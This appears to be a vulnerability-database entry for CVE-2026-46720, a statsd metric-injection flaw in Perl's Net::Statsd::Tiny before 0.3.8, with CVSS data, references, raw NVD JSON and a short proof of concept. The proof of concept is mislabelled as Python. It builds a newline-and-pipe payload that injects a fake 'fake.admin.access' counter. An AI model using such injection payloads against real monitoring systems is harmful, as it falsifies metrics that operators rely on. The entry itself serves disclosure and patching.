CVE-2026-46720

Description

Net::Statsd::Tiny versions before 0.3.8 for Perl allowed metric injections. The metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Net::Statsd::Tiny < 0.3.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/perl
use strict;
use warnings;

# This PoC demonstrates how untrusted input can inject metrics.
# It requires a vulnerable version of Net::Statsd::Tiny (< 0.3.8)

# Simulating the vulnerable library usage scenario
my $metric_name = $ARGV[0] || 'legit.metric';
my $metric_value = 100;

# Malicious payload containing newline and pipe to inject a fake metric
# Payload structure: [Real Metric]\n[Fake Metric Name]:[Fake Value]|[Fake Type]
my $malicious_payload = "legit.requests\nfake.admin.access:1|c";

print "[+] Sending payload: $malicious_payload\n";

# In a vulnerable application, this might be passed directly to the statsd client:
# my $statsd = Net::Statsd::Tiny->new( host => '127.0.0.1', port => 8125 );
# $statsd->increment($malicious_payload);

print "[+] If the server parses this, it will record two metrics:\n";
print "    1. legit.requests (increment)\n";
print "    2. fake.admin.access:1 (counter)\n";

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-46720
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-46720
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-46720/
[4] VulDB https://vuldb.com/cve/CVE-2026-46720
[5] https://github.com/robrwo/Net-Statsd-Tiny/commit/06f814f52fbcc0b2afddf7a2d6f8137fd3cede13.patch
[6] https://metacpan.org/release/RRWO/Net-Statsd-Tiny-v0.3.8/changes
[7] https://www.cve.org/CVERecord?id=CVE-2026-46719

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-46720", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-17T18:16:27.397", "lastModified": "2026-05-18T17:40:45.343", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::Statsd::Tiny versions before 0.3.8 for Perl allowed metric injections.\n\nThe metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://github.com/robrwo/Net-Statsd-Tiny/commit/06f814f52fbcc0b2afddf7a2d6f8137fd3cede13.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Net-Statsd-Tiny-v0.3.8/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-46719", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}}